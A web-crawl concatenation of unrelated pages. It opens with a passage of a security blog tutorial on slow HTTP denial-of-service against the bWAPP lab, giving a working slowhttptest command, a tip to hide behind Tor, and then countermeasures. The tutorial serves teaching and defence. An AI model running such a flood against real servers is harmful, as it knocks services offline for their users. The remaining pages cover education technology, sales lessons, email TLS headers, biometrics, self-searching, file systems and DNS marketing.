21:31:32 GMT < Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1 < X-Powered-By: PHP/5.3.2-1ubuntu4.30 < Expires: Thu, 19 Nov 1981 08:52:00 GMT < Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 < Pragma: no-cache < Vary: Accept-Encoding < Content-Length: 11291 < Content-Type: text/html At this point, nothing stops us from sending follow up headers with random values: wait some seconds… And nothing stops us from simulating a slow connection on each one of these requests, so the server is going to have to wait until we receive the full resource. Why not do a thousand requests until every single connection available on the server pool is busy with us? To do this, we are going to use a tool. First, let’s pull the slowhttptest docker image from the docker hub. docker pull frapsoft/slowhttptest And write the following command: sudo docker run --name DoSBWAPP --rm frapsoft/slowhttptest \ -c 65539 -B -i 10 -l 300 -r 10000 -s 16384 -t firstname \ -u "http://192.168.56.101/bWAPP/xss_get.php" -x 10 -p 300 The parameters you see are described below: Table 1. Slowhttptest description use 65539 connections specify to slow down the http in message body mode seconds of interval between follow up data, per connection duration of the test in seconds timeout in seconds to wait for HTTP response on probe connection, after which server is considered inaccessible connections per second value of Content-Length header max length of follow up data in bytes add ?firstname=(-x 10bytes) to the target url While the attack is running a user that tries to access the service is going to see: Figure 3. bWAPP is trying to connect without success If the attack is long enough, it is going to get timed out: Figure 4. bWAPP gets timed-out Once the attack is finished everything returns to a normal state: Figure 5. bWAPP working normally after attacks Since we only need a few resources (the internet and a laptop) we can even do it on a low-bandwidth connection. Moreover, since we don’t need too much bandwidth, we can pass everything through a proxy in the tor network and hide ourselves. Sounds scary, how do I protect myself? Counter-measures depend mainly on your service. Some useful mechanisms to prevent this kind of attacks are: Limit the number of resources an unauthorized user can expend. Set the header and message body to a maximum reasonable length. Define a minimum incoming data rate, and drop those that are slower. Set an absolute connection timeout. Use a Web Application Firewall. Reject connections with verbs not supported by the URL. In cases where you need to set minimum and maximum limits, it’s a good idea to use the values from your statistics. If the value is too short, you may risk dropping legitimate connections; if it is too long, you won’t get any protection from attacks. Perhaps using a margin ranging from one to two standard deviations may help you with this. I really hope that you liked this article. I wish you a nice week, and will see you in another post! Ready to try Continuous Hacking? Discover the benefits of our comprehensive Continuous Hacking solution, which hundreds of organizations are already enjoying.
<urn:uuid:707c277b-e98f-4c3d-8277-3a02ef9f8c5e>
CC-MAIN-2022-40
https://fluidattacks.com/blog/asymmetric-dos-slow-http-attack/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.22/warc/CC-MAIN-20220930181143-20220930211143-00468.warc.gz
en
0.846045
2,302
3.09375
3
By Daniel McGee, director of technology and library services, Laurel School. Thus far, 2020 has been a year where the field of educational technology has been permanently altered. This year’s Covid-19 pandemic has brought challenges and confusion to daily life, with educational institutions pivoting to a distance learning model nearly overnight. The impact of this shift has been far reaching, affecting the cadence and delivery of daily instruction, creating a new impetus for teachers to learn and upskill quickly. The result is a watershed moment for educational technology that will cause ripple effects in education for this and future generations. For private, independent schools, the conversations, processes, and procedures have been different from those affecting public schools, though the needs of students remain the same. In my role as an independent school technology director, the lessons of the past few months have been a series of dichotomous notions with a time for careful planning, while also being a time of flying by the seat of your pants; and notably, a time where rules are created, but also while basic tenets of educational technology are proving to be helpful guides. I have learned some essential lessons that are helpful now, and I see them as being helpful in perpetuity. Lesson One: Select Familiar Tools and Technology The first lesson is focused on the importance of educational technology leaders to select distance learning tools and topics that are familiar to teachers and students. Having a minimum of familiar, established systems for students, teachers, and families to access lowers the barriers to success and allows students to focus on learning what they need to know, not acclimating themselves to a host of new tools. During a pandemic is not an optimal time to introduce new tools if it can be avoided. If a school has a learning management system (LMS) in place and is actively using it, it is a hard case to introduce a new system. The LMS is the stand-in for the physical classroom; just as physically moving a home or school is a disorienting process that requires acclimation, the virtual classroom environment fostered through the LMS should remain as consistent as possible. Video meetings have become a staple of the distance learning experience. For schools using a suite of online productivity tools such as Google’s G Suite or Microsoft’s Office 365, using Meet or Teams lowers the barriers of entry for teachers and students to begin using such tools due to the integrated nature of these video services within the larger platform. Consistency is key in using any online tool, first in the selection of a single, unified tool for the school to use, and second in its use and deployment. Experts in online learning advise the use of a common template for teachers to craft LMS course pages, and students should have a consistent means to access their virtual classrooms via the chosen video conferencing platform.
<urn:uuid:82dc052c-3822-4d61-95f5-5a4ac5688e58>
CC-MAIN-2022-40
https://educationitreporter.com/tag/laurel-school/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337244.17/warc/CC-MAIN-20221002021540-20221002051540-00468.warc.gz
en
0.958244
584
2.984375
3
August 12th marks the 60th anniversary of one of the most famous children's books of all time - Dr. Seuss's Green Eggs and Ham. The book was the result of a $50 bet between the author and his publisher that Dr. Seuss couldn't write a book using only 50 words. This "simple" book is full of lessons that are worth revisiting. Be willing to change your mind The unnamed character in the book doesn't think he'll like Green Eggs and Ham and that belief drives his refusal to try them. Spoiler Alert: He ends up liking them quite a bit. New things can often make us feel like Sam-I-am offering us Green Eggs and Ham but if we have an open mind, we may be pleasantly surprised! For those of us engaged in sales, Sam-I-am is the ultimate salesperson!! He simply did not accept defeat and kept on selling the virtues of Green Eggs and Ham! While we probably can't use "in a house" or "with a mouse" as effective strategies, Sam-I-am surely modeled the willingness to overcome objections at every turn! Be willing to use a different approach Persistence is important, but overcoming objections means sometimes changing your approach. It means that if you can't make the sale with a box or with a fox, perhaps you need to try to make the sale with a goat or a boat! Seriously, every customer is different and finding the right benefits is the key to making the sale! Asking the right questions is the key to handling so many different customer issues! Before you rush to a solution, make sure you're asking all the right questions first. Whether you're troubleshooting, selling, or servicing, asking questions to allow you to see the whole picture leads to efficient resolution! Sam-I-am spent an entire book dealing with a cantankerous customer and did so with a smile the entire time! "You may like them. You will see." That optimism and positive attitude eventually led the unnamed character to try those Green Eggs and Ham! Focus on your goal It's easy to get distracted. In a car, in a tree, on a train, in the rain, in the dark, with a goat, on a boat - Sam-I-am kept his eyes on the goal at every crazy turn and that focus paid off! While I've outlined a few here, I am sure there are even more lessons to be learned from this classic, even if our reading skills suggest a more "complicated" book. If you now feel an immediate and insatiable desire to experience this book again, you can listen and read along here. Learn even more about Dr. Seuss with Becoming Dr. Seuss by Brian Jay Jones.
<urn:uuid:5232dd97-058a-4dbc-a9ce-aca084154c8b>
CC-MAIN-2022-40
https://happitu.com/blog/green-eggs-and-ham/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337244.17/warc/CC-MAIN-20221002021540-20221002051540-00468.warc.gz
en
0.969405
579
2.5625
3
How Can You Tell if an Email Was Transmitted Using TLS Encryption? Frequently, we are asked to verify if a sent or received email was encrypted using SMTP TLS during transmission. For example, banks, healthcare organizations under HIPAA, and other security-aware institutions require that emails be secured by TLS encryption. Email should always be transmitted with this basic level of email encryption to ensure that the email message content cannot be eavesdropped upon. To see if a message was sent securely, looking at the raw headers of the email message in question is easy. However, it requires some knowledge and experience to understand the text. It is actually easier to tell if a recipient’s server supports TLS than to tell if a particular message was securely transmitted. To analyze a message for transmission security, we will look at an example email message sent from Hotmail to LuxSci. We will see that Hotmail did not use TLS when sending this message. Hotmail is not a good provider to use when security or privacy are required. An Example Email Message First, we must understand that an email message typically passes through several machines on its way from sender to recipient. Roughly speaking: - The sender’s computer talks to the sender’s email or WebMail server to upload the message. - The sender’s email or WebMail server then talks to the recipient’s inbound email server and transmits the message to them. - Finally, the recipient downloads the message from their email server. (for more details, see this article) It is step 2 that people are most concerned about; they usually assume or check that everything is secure and OK at the two ends. Indeed, most users who need to can take steps to ensure that they are using SSL-enabled WebMail or POP/IMAP/SMTP/Exchange services so that steps 1 and 3 are indeed secure. The intermediate step, where the email is transmitted between two different providers, is where messages may be insecurely transmitted. To determine if the message was transmitted between the sender’s and recipient’s servers securely (over TLS), we need to extract the “Received” header lines from the received email message. If you look at the “source” of the email message, the lines at the top start with “Received.” In an example email message from someone on Hotmail, the Received headers look like this. The email addresses, IPs, and other information are fake for obvious reasons. What do These Received Headers Say? The things to notice about these Received headers are: - They are in reverse chronological order. The first one listed shows the last server that touched the message; the last one is the first server that touched it. - Each Received line documents what a server did and when. - There are three sets of servers involved in this example: one machine at Hotmail, one machine at Proofpoint, where our Premium Email Filtering takes place, and some machines at LuxSci, where final acceptance of the message and subsequent delivery happened. Presumably, the processing of email within each provider is secure. So, you have to watch out for the hand-offs between Hotmail and Proofpoint and between Proofpoint and LuxSci, as these are the big hops across the internet between providers. In the line where LuxSci accepts the message from Proofpoint, we see: (version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NOT) This section, typical of most email servers running “sendmail” with TLS support, indicates that the message was encrypted during transport with TLS using 256-bit AES encryption. (“Verify=not” means that LuxSci did not ask Proofpoint for a second SSL client certificate to verify itself, as that is not usually needed or required for SMTP TLS to work correctly). Also, “TLSv1/SSLv3” is a tag that means that “Some version of SSL or TLS was used;” it does not mean that it was SSL v3 or TLS v1.0. It could just as well have been TLS v1.2 or TLS v1.3. So, the hop between Proofpoint and LuxSci was locked down and secure. What about the hop between Hotmail and Proofpoint? The Proofpoint server’s Received line makes no note of security at all! This means that the message was probably NOT encrypted during this step. Whose fault is that? Well, at this time, either Hotmail did not support opportunistic TLS encryption for outbound email, OR Proofpoint did not support receipt of messages over TLS, and thus TLS could not be used. Without further context, you would not know which server (or both) did not support TLS. We know that Proofpoint, like LuxSci, supports inbound TLS encryption. In fact, from another example message where LuxSci sent a message to Proofpoint, we see the Received line: Received: from unknown [220.127.116.11] (EHLO wgh.luxsci.com) by dispatch1-us1.ppe-ho sted.com.ppe-ho sted.com (using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM -SHA384 (256/256 bits)) with ESMTP id b-022.p01c11m003.ppe-ho sted.com (envelope-from <[email protected]>); Mon, 02 Feb 2009 19:28:27 -0700 (MST) The red text makes it clear that the message was indeed encrypted. Some things to consider when analyzing email headers for encryption usage - The receiving server will log what kind of encryption, if any, was used in receiving the message in the headers. - Different email servers use different formats and syntax to display what kind of encryption was used. Look for keywords like “SSL,” “TLS,” “Encryption,” etc., which will signify this information. - Not all servers will record the use of encryption; nothing says that they have to encrypt email. While LuxSci has always logged encryption use, McAfee has only been logging this since 2008. Before that time, TLS encryption was still possible and normal with their servers, but there was no way to tell from the headers if it was used. - Messages passed between servers at the same provider do not necessarily need TLS encryption to be secure. For example, LuxSci has back-channel private network connections between many servers so that information can pass between them without SMTP TLS, but where the data is still secured. So, the lack of TLS usage between two servers does not mean that the transmission between them was “insecure.” You may also see multiple received lines listing the same server: the server passes the message between different processes within itself. This communication also does not need to be TLS encrypted. - If you are a LuxSci customer, view the online email delivery reports to see if TLS was used for any particular message. We record the kind of encryption in thr delivery reports, so there is no need to read message headers. How can you ensure Secure Message Transmission? With some servers not reporting the use of TLS, and in some cases TLS not being needed, how can you determine if a message was transmitted securely from sender to recipient? To answer this question accurately, you must understand the properties, servers, and networks. While you may be able to answer in the affirmative, based on headers, in some cases, you cannot necessarily answer negatively without knowing what things are recorded by each system’s servers. In our example of a message from Hotmail to LuxSci, you need to know that: - Proofpoint and LuxSci will always log the use of TLS in the headers. This tells us that the Hotmail to Proofpoint hop was not secure as nothing is recorded there. - The transmission of messages within LuxSci’s infrastructure is secure due to private back channel transmissions. So, even though there is no mention of TLS in every Received line after LuxSci accepts the message from Proofpoint (in this example), the transfer of the messages between servers in LuxSci is as secure as using TLS. Also, multiple received lines can be added by the same server as it talks to itself. Generally, these hand-offs on the same server will not use TLS, as there is no need. We see this also in the LuxSci example, as “abc.luxsci.com” adds several headers. - We don’t know anything about Hotmail’s email servers, so we don’t know how secure the initial transmissions within their network are. However, since we know that they did not securely transmit the message to Proofpoint, even though they could have, we do not have much confidence that the transmissions and processing within Hotmail (which may have gone unrecorded) were secure at all. What about the initial sending and receipt of the message? So, we skipped steps 1 and 3 and focused on step 2 – the transmission between servers. Steps 1 and 3 are equally, if not more important. Why? Because eavesdropping on the internet between ISPs is less of a problem than eavesdropping near the sender and recipient (i.e., in their workplace or local wireless hotspot). So, one must ensure messages are sent securely and received securely. This means: - Sending: Use SMTP over SSL or TLS when sending from an email client or use WebMail over a secure connection (HTTPS). - Receiving: Be sure that your POP or IMAP connection is secured via SSL or TLS; If using WebMail to read your email, be sure it is over a secure connection (HTTPS). - WebMail: There is generally no record in the email headers to indicate if a message sent using WebMail was transmitted from the end-user to WebMail over a secure connection (SSL/HTTPS). You can generally control one side and ensure it is secure; you can’t control the other without taking extra steps. So, what can you do to ensure that your message is secure even if it might not be transmitted securely and if your recipient might try to access it insecurely? You could use end-to-end email encryption (like PGP or S/MIME, which are included in SecureLine) or a secure email pickup service like SecureLine Escrow that doesn’t require the recipient to have to install or set up anything to get your secure email message. These all meet the security requirements of HIPAA and organizations that mandate email transmission encryption. Of course, if you can ensure that the email sent from you to your essential recipients will always be transmitted securely, that is the best solution.
<urn:uuid:77a5ba0e-b168-4f48-9b7c-409f61133c29>
CC-MAIN-2022-40
https://luxsci.com/blog/how-you-can-tell-if-an-email-was-sent-using-tls-encryption.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337723.23/warc/CC-MAIN-20221006025949-20221006055949-00468.warc.gz
en
0.946202
2,309
2.828125
3
May I know your password? No one in today’s world is fool enough to disclose their passwords that easily. Still, cybercriminals have successfully gathered numerous account details and used them to enter your social media account forcefully. Ordinary people know this method as identity theft. A cybercriminal either uses your account or creates a fake one similar to yours and uses it for notorious purposes. For instance, they can use it to ask for money from your friends, publish sensitive material under your name to harm your reputation, and much more. Identity theft is a common problem many victims have faced in their lifetime. Biometrics is a step forward to tackle this threat. However, how secure biometric authentication is still questionable. Therefore, I created this guide to answer the reliability of biometric authentication to save yourself from identity theft. Further, we will also discuss the necessary measures to make sure no one can steal your identity. So, if you are ready to open your eyes, let’s begin. What is Identity Theft? Identity theft is when someone uses your credentials to steal your identity. Cybercriminals can sniff into the trash bins to find your bank statement, or they can hack your computer to gain control over your account. In any case, the victim is commonly targeted for financial fraud, bad credit, or unauthorized transactions. A personal motive usually steers identity theft in the case of social media accounts. Let’s say a bully is disturbing some nerd on the playground. So the nerd decides to take revenge by uploading shameful posts from the bully’s account. Identity theft is a serious crime, no matter what is the motive behind it. How Biometrics Comes to Rescue? One common thing behind all identity theft scams is the exposure of credentials and passwords. No cybercriminals can steal your identity unless he has your account password. There are several ways to gather that information. For instance, insider news, hacking, sending malware to your device, and much more. Even if you haven’t told your password to anyone or it is not saved on your device, a hacker can sniff it out using security questions. Answers to your security questions are readily available on your social media accounts. What these cybercriminals can not steal (easily) is your biometric information. Let’s see what personal data comes under the biometric section. Humans have shifted from using their thumbprints to sign a document to create a unique signature. However, thumbprints or fingerprints are finding their way back into the world through digital mediums. It is a well-known fact that every person on this planet shares a different fingerprint, even twins. Therefore, they become a reliable way to mark unique identities. Facial recognition deals with collecting your facial structure for identification. It is the weakest section of all biometric authentication methods, which led to a series of iterations. Initially, facial recognition was so dim that you could have fooled it using a picture. Later, developers introduced eye movements to make it robust. The facial recognition technology currently on the market uses an infrared grid to determine your facial structure. Thus, making the technology more robust and reliable. A voice recognition model registers your speech frequency and pattern to authenticate your identity. You might have seen it in movies where a person unlocks a door by using voice commands. A hacker would need your voice samples, your exact password, and a mind-blowing skill to mimic your voice to use it against you. Thus, making it much more secure than a traditional password. Firstly, keep in mind that both the Retina scan and Iris scan are different things. However, since they both deal with your eyes, let us club them for understanding’s sake. Similar to fingerprints, every person’s retinal and iris pattern is unique. In general, eye scanning technology registers your eye pattern and uses it to verify your identity. Two significant facts govern the robustness and reliability of this method. - No two people share the same eye patterns. - An amputated eye decomposes quickly and won’t come in any use to criminals. How Biometrics Can Protect you from Identity Theft Now that we understand what different biometric identification processes are let’s see how they can protect us from identity theft. You Become the Password First and foremost comes the fact that you become the password while using biometric technology. Unlike security questions to use two-factor authentication, you become the password. The traditional ways of two-factor authentication either use your phone for OTP or use security questions to confirm your identity. Both of which are easier to crack. Once you have entered your biometric details into a system, it becomes nearly impossible for hackers to access your account or device. Biometric authentication has recently found its way into daily use. We can not imagine using our fingerprint to open a phone in the last decade. Even being new, biometric technology has shown promise to protect individual data significantly. This technology has evolved enormously in a few years. We can expect it to reach new highs in the future as well. Since developers are trying hard to make biometric authentication more robust each passing day, you can think of using them everywhere, from grocery transactions to cross-country verification, in the coming years. Extra Measures to Protect your Identity We are hoping for a bright future where identity theft becomes minimal to no threat for ordinary people. Still, biometric authentication has not yet captured every field, device, and area. Therefore, there is a better scope for it in the future. Meanwhile, it also raises the vulnerabilities this technology has to deal with currently. Developers work days and nights to make it more secure for us. What we can do is take the best precautions to protect ourselves. Here are some actionable tips you can apply quickly to feel safer with your identity. - Update all your programs to the latest versions. Hackers usually benefit from security holes to breach your device. By keeping your software up to date, you make sure of installing a security patch to eliminate previously existing vulnerabilities. - Change your passwords frequently. You will come across this advice every time you read about cybersecurity. Changing your passwords in a timely fashion helps you keep your data safe. Hackers won’t take much effort to crack the same account password again and again. - Use a password manager. If you find it difficult to remember passwords, I suggest using a password manager. A good password manager would only require a master password to control all other passwords. You can even keep your fingerprint as the master password for many devices. - Never reveal answers to security questions publicly. Your security questions are usually the only barrier for a hacker to enter your system. Avoid filling online forms for gifts or revealing such information to unknown people. Although biometric authentication is relatively new in the market, it has proved to be a significant step in personal identification and data protection. We can also expect it to become more robust, complementing blockchain technology. It is reliable for securing your device and personal information still I suggest taking extra measures to keep yourself safe. Cybercriminals are also evolving, and they already have tools to break previous biometric technologies. It is just a matter of time for cybercriminals to find a way to bypass your biometrics. Therefore, the best way to keep your account safe is by using all possible security measures.
<urn:uuid:d964bb09-226c-428a-9881-f8baea0dbb36>
CC-MAIN-2022-40
https://www.m2sys.com/blog/guest-blog-posts/how-biometrics-can-counter-identity-theft/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334579.46/warc/CC-MAIN-20220925132046-20220925162046-00668.warc.gz
en
0.938135
1,563
2.640625
3
Ever Google search for your own name? Even if you haven’t, there’s a good chance that a friend, family member or potential employer will at some point. And when they do, do you know everything that they’ll find? Google is chock full of personal information you may not always want public. Whether it’s gathered by the search engine itself or scummy people-search websites, you have a right to know what kind of data other people can access when they look up your name. Tap or click here to see how to remove yourself from people search sites. What others see about you online can mean the difference in landing a job or spending more time looking for one. If you want to take control of your reputation online, here’s why you need to start searching for yourself before others beat you to it. Use exact phrases to find more than mentions To get started with searching yourself on Google, it’s important to know how to search for exact phrases. This means telling Google you want to look up the words you typed exactly as you typed them — with no splitting terms or looking up one word while ignoring others. To do this, simply search for your name (or any term) in quotation marks. As an example, look up “Kim Komando” and include quotation marks. Now, Google won’t show results for Kim Kardashian along with Komando.com. Using exact phrases will weed out results for other people with similar names to yours. If you have a more common name, you may have to go through several pages before finding yourself. If you aren’t finding anything or your name is very common, use your name plus modifiers like the city or state you live in, the names of your school(s), the name of the company you work for or other details. Make note of anything that you don’t feel comfortable with others finding and either write down the web addresses or bookmark them. A picture says a thousand words After you’ve saved the websites you want to go over, switch over to Google’s Image Search and scan through any pictures of you. It’s much easier to look through hundreds of images quickly versus hundreds of links, and you might be surprised at the images and websites you find. If you find an image that concerns you, you can run a reverse image search to see where it’s hosted. To do this, follow these steps: - Open Google Image Search and click the Camera icon in the search bar - Paste a link to the image or upload the image you want to search for. - Your results will be shown as a combination of images and relevant websites. If an exact match is found, it will populate at the top of your results. If the image has no text on it or any identifying information, don’t worry. Your image can turn up even if it only has your face. Where you are and where you’ve been Next, you’ll want to run a search for your past and current email addresses and phone numbers. This helps you see which sites have access to this personal data and will also show you what others can find if they look this information up. If you’ve ever signed up for a discussion board or forum with your personal email address, your post history could easily show up if someone Googles you. The same can be said for social media pages and blogs. Find and make note of any posts or content that you’d prefer to make private. Finally, run a search for your social media account usernames. Try to remember any usernames you may have used online and look those up. For example, if you search for the username “kimkomando,” you’ll turn up Kim’s Facebook, Twitter, Pinterest and Instagram accounts. If you can’t remember, try searching for your name (as an exact phrase in quotation marks) plus the social network you want to look up. This might reveal accounts that you forgot about or that are less private than you think. If your real name is visible anywhere, it probably falls into this category. Keep track going forward If you want to stay on top of information that pops up about you on social media (or the rest of the web), you can set up a free Google Alert for your name. It’s an easy way to keep tabs on your online reputation. Here’s how to set up a Google Alert for your name: - Visit Google.com/alerts and type what you want Google to alert you about in the search bar. - Click Show options to change settings for frequency, sources, language and region. You can also specify how many results you want and where you want them delivered. - Click Create Alert to start receiving alerts on yourself or other search topics you’re interested in. Bonus: What does Google know about me? And last but not least, let’s take a moment to address data that Google itself keeps on you. By default, Google records every search you enter, your location (if you use Google Maps), video-watching history and searches from YouTube, and much more. Anyone who knows your Google Account email and digs deep enough can learn plenty about your online activities. If you haven’t visited your Google Account and privacy settings in a while, now’s the time to do it. Now that you’ve searched for yourself and taken note of content that people can see if they look you up, it’s time to take things a step further and actually remove any data that you don’t want public. Want to know how? Just follow along for part two of our guide to Google-searching yourself.
<urn:uuid:5174558b-feef-48e5-ba18-4aeec489738a>
CC-MAIN-2022-40
https://www.komando.com/privacy/why-you-should-google-yourself-now/311115/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335355.2/warc/CC-MAIN-20220929131813-20220929161813-00668.warc.gz
en
0.909188
1,214
2.53125
3
In general, distributed files systems are IT solutions that allow multiple users to access and share data in what appears to be a single seamless storage pool. The back-end enabling systems can follow one of a few architectural patterns, in popular order they are client-server, which tends to be the most common, cluster-based architectures are most useful in large data centers, and decentralized files systems also exist. These architectures comprise multiple back-end systems connected together via a network, with middleware orchestrating file storage, and employing many techniques to ensure the “distributed” system’s performance meets the needs of users. In this way, the distributed system has a capacity of service, and the load on that service is the total demand by all the active users. When load approaches or exceeds that capacity, system performance will degrade, and will show signs of lag, or service outages. The chief benefit rests on the fact that sharing data is fundamental to distributed systems, and therefore forms the basis for many distributed applications. Specifically, distributed files systems are proven ways to securely and reliably accommodate the data sharing between multiple processes over long periods. This makes them ideal as a foundational layer for distributed systems and applications. Distributed systems form the modern concept of “the cloud” and support the idea that the cloud is essentially limitless in storage capacity. These systems can expand behind the scenes and match any growth in demand. They can manage massive volumes of information, safeguard its integrity, and ensure its availability to users 99.9995% of the time. And in that small sliver of downtime, there are contingencies upon contingencies in place. For cloud data centers, this is their business, and so are able to benefit from economies of scale more readily than enterprises or smaller businesses that deploy their own distributed systems. Enterprises and small businesses may deploy their own distributed file systems to facilitate business operations, regionally, even globally. For instance, distributed systems may support private clouds, parallel computing, even real-time control systems. Municipalities deploy real-time traffic control and monitoring systems to better manage commuter times, all made possible by DFS supported applications. Sophisticated parallel computing models are deployed across many participating computing systems in collaborations that help compute large data sets, as in astronomical calculations where one computer simply won’t do the work.
<urn:uuid:9052cdd2-6c1a-4af7-b00c-6d9741e6f5f6>
CC-MAIN-2022-40
https://www.hitachivantara.com/en-anz/insights/faq/what-is-a-distributed-file-system.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337731.82/warc/CC-MAIN-20221006061224-20221006091224-00668.warc.gz
en
0.945147
476
2.953125
3
The Domain Name System (DNS) was created in 1983 to enable people to easily identify all the computers, services, and resources connected to the Internet by name—instead of by Internet Protocol (IP) address, an impossible-to-memorize string of binary information. A DNS server translates the domain names you type into a browser into an IP address, which allows your device to find the service or site you're looking for on the Internet. Arguably the primary technology enabling the Internet, DNS is also one of the most important components in networking infrastructure. In addition to delivering content and applications, DNS also manages a distributed and redundant architecture to ensure high availability and fast user response time—so it is critical to have an available, intelligent, secure, and scalable DNS infrastructure. If DNS goes down, most web applications will stop working properly, affecting your business—and your brand. F5's end-to-end Intelligent DNS scale reference architecture enables organizations to build a strong DNS foundation that maximizes resources and increases service management, while remaining agile enough to support both existing and future network architectures, devices, and applications. When a user requests a web page, that request is passed to a local DNS server, which in turn communicates with the main DNS servers. Everything works well until a traffic surge or an attacker floods the server with DNS query requests. If your main DNS server gets overloaded, it will stop responding, which can render your website unavailable. DNS failures account for 41 percent of web infrastructure downtime, so it's essential to keep your DNS available. According to a survey by the Aberdeen Group, organizations lose an average of $138,000 for every hour their data centers are down. Downtime negatively affects customers, can lead to loss of revenue, and can even affect employees trying to access corporate resources, such as email. That's why the importance of a strong DNS foundation can’t be overstated. Without one, your customers may not be able to access your content and applications when they want to—and if they can't get what they want from you, they'll likely go elsewhere. There are many reasons why DNS requirements are growing so quickly. Over the last five years, the number of internet users is grown by 82 percent; the number of websites has grown from approx. 580 million to 1.24 billion and the number of DNS queries has grown by more than 100 percent. In addition, the number of mobile connections in use grew by 2.2 billion and nearly 60 percent of web users say they expect a website to load on their mobile phone in three seconds or less. Organizations are experiencing rapid growth in terms of applications as well as the volume of traffic accessing those applications. Plus, the web applications themselves are growing and continually becoming more complex. Every icon, URL, and piece of embedded content on a web page requires a DNS lookup. Loading complex sites may require hundreds of DNS queries, and even simple smartphone apps can require numerous DNS queries just to load. In the last five years, the volume of DNS queries for .com and .net addresses has more than doubled, increasing to an average daily query load of 124 billion in the first quarter of 2016. In the same timeframe, more than 10 million domain names were added to the internet. Future growth is expected to occur at an even faster pace as more cloud implementations are deployed. If DNS is the backbone of the Internet—answering all the queries and resolving all the numbers so you can find your favorite sites—it’s also one of the most vulnerable points in your network. Due to the crucial role it plays, DNS is a high-value target for attackers. DNS DDoS attacks can flood your DNS servers to the point of failure or hijack and redirect requests to a malicious server. To prevent this, a distributed high-performing, secure DNS architecture and DNS offload capabilities must be integrated into the network. Generally, organizations have a set of DNS servers, each one capable of handling up to 150,000 DNS queries per second. High-performance DNS servers can handle around 200,000 queries per second. The bad guys can easily exceed those rates, as exemplified by DNS outages affecting, Dyn, The New York Times, LinkedIn, Network Solutions, and Twitter. To address DNS surges and DNS DDoS attacks, companies add more DNS servers, which are not really needed during normal business operations. This costly solution also often requires manual intervention for changes. In addition, traditional DNS servers require frequent maintenance and patching, primarily for new vulnerabilities. When looking for DNS solutions, many organizations select BIND (Berkeley Internet Naming Daemon), the Internet's original DNS resolver. Installed on approximately 80 percent of the world's DNS servers, BIND is an open-source project maintained by Internet Systems Consortium (ISC). ISC is a non-profit organization with a for-profit consulting arm called DNS-CO, which offers 4 different levels of subscriptions and support services. Despite its popularity, BIND requires significant maintenance multiple times a year primarily due to vulnerabilities, patches, and upgrades. It can be downloaded freely, but needs servers (an additional cost, including support contracts) and an operating system. In addition, BIND typically scales to only 50,000 responses per second (RPS), making it vulnerable to both legitimate and malicious DNS surges. The F5 Intelligent DNS Scale reference architecture provides a smarter way to respond and scale to DNS queries and takes into account a variety of network conditions and situations to distribute user application requests and application services based on business policies, data center conditions, network conditions, and application performance. Instead of worrying about DNS outages and purchasing additional DNS infrastructure to combat surges, you can install an F5 BIG-IP device in your network's DMZ and let it to handle requests on behalf of your main DNS server. BIG-IP DNS hyperscales to 100 million RPS, which means that even large surges of DNS requests (including the malicious ones) won’t disrupt your content or affect the availability of critical applications. Your network administrators can rest easier, knowing that your site will respond to all DNS queries and remain available even during an attack. Your brand is protected, and your company can avoid an embarrassing front-page story. The F5 Intelligent DNS Scale reference architecture helps ensure that your applications and content are continuously available to your users. One of the most important pieces of this architecture is the specifically designed DNS Express query response feature in BIG-IP DNS, which manages authoritative DNS queries by transferring zones from the primary DNS server to its own RAM. BIG-IP DNS only has to open the DNS query packet once, as long as the request is for an address that’s in the zone that was transferred to DNS Express, simplifying the process and significantly improving performance and response times of your DNS architecture. With DNS Express, the individual core of each BIG-IP device can answer approximately 125,000 to 200,000 requests per second, scaling up to more than 50 million query RPS, greater than 12 times the capacity of a typical primary DNS server. Each BIG-IP device is ICSA Labs Certified as a network firewall. By intelligently evaluating the reputation of Internet hosts, the BIG-IP device can prevent attackers from knocking your DNS offline with a DNS DDoS attack, stealing data, compromising corporate resources, or otherwise disrupting your business. In addition, DNSSEC can protect your DNS infrastructure, including cloud deployments, from cache poisoning attacks and domain hijacks. With DNSSEC support, you can digitally sign and support your DNS query with encrypted responses, enabling the resolver to determine the authenticity of the response and preventing DNS hijacking and cache poisoning. The F5 IP Intelligence service enhances your overall security by denying access to IP addresses known to be infected with malware, in contact with malware distribution points, and with poor reputations. The F5 Intelligent DNS Scale reference architecture also helps keep your content and applications available by responding to DNS queries from the edge of the network, rather than from deep within your critical infrastructure. When you offload DNS responses to the BIG-IP platform, requests don’t reach the back end of your network, which greatly increases your ability to scale and respond to DNS surges along with protecting your DNS infrastructure. By increasing the speed, availability, scalability, and security of your DNS infrastructure, the F5 Intelligent DNS Scale reference architecture makes sure your customers, and your employees, can access your critical web, application, and database services whenever they need them. This also applies to cloud deployments or infrastructures where DNS is distributed. Organizations can replicate their high-performance DNS infrastructure in almost any environment. They may have cloud DNS for disaster recovery/business continuity, or even a cloud DNS service with signed DNSSEC zones. F5 DNS Services enhanced AXFR support offers zone transfers from a BIG-IP device to any DNS service, enabling organizations to replicate DNS in physical, virtual, and cloud environments. The DNS replication service can be sent to other BIG-IP devices or other general DNS servers in data centers or clouds that are closest to the users. In addition, organizations can send users to a site that will give them the best experience. BIG-IP DNS services use a range of load balancing methods and intelligent monitoring for each specific app and user. Traffic is routed according to your business policies, as well as current network and user conditions. BIG-IP DNS services includes an accurate, granular geolocation database, giving you control of traffic distribution based on user location. BIG-IP DNS is a global DNS solution, providing name services at the very edge of your service delivery and access networks. By employing geographic location services, it can direct users to the best service delivery data center based on their physical location. BIG-IP DNS provides the following name services: Within the data center, BIG-IP Local Traffic Manager (LTM) can ensure that your applications and content remain highly available by creating a fault-tolerant architecture from the mobile edge through to the service. In addition to providing high availability, 